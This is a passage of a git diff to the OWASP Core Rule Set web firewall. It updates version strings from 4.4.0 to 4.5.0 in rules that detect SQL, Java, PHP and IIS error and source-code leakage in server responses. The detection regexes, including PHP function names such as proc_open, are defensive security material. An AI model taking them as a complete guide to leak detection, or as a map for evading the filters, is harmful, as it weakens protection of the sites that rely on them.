ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -65,7 +65,7 @@ SecRule RESPONSE_BODY "@rx (?i)\bORA-[0-9][0-9][0-9][0-9][0-9]:|java\.sql\.SQLEx tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -84,7 +84,7 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]| tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -103,7 +103,7 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -122,7 +122,7 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -141,7 +141,7 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -160,7 +160,7 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -179,7 +179,7 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -198,7 +198,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -217,7 +217,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -236,7 +236,7 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -255,7 +255,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -274,7 +274,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.* tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -293,7 +293,7 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -312,7 +312,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/J tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -331,15 +331,15 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" SecMarker "END-RESPONSE-951-DATA-LEAKAGES-SQL" diff --git a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 8911bc5..959b3de 100644 --- a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ "id:952100,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ @@ -52,13 +52,13 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" SecMarker "END-RESPONSE-952-DATA-LEAKAGES-JAVA" diff --git a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf index 2f711e2..118913b 100644 --- a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ "id:953100,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ @@ -52,7 +52,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ @@ -71,11 +71,11 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \ "id:953101,\ phase:4,\ @@ -92,11 +92,11 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecMarker "END-RESPONSE-953-DATA-LEAKAGES-PHP" diff --git a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf index b953853..8b8315a 100644 --- a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf +++ b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \ "id:954100,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error

.*?

part of the server has crashed or it has a configuration error\.

|cannot connect to the server: timed out)" \ @@ -53,7 +53,7 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?: tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ @@ -73,7 +73,7 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_STATUS "!@rx ^404$" \ @@ -93,17 +93,17 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ "capture,\ t:none,\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" SecMarker 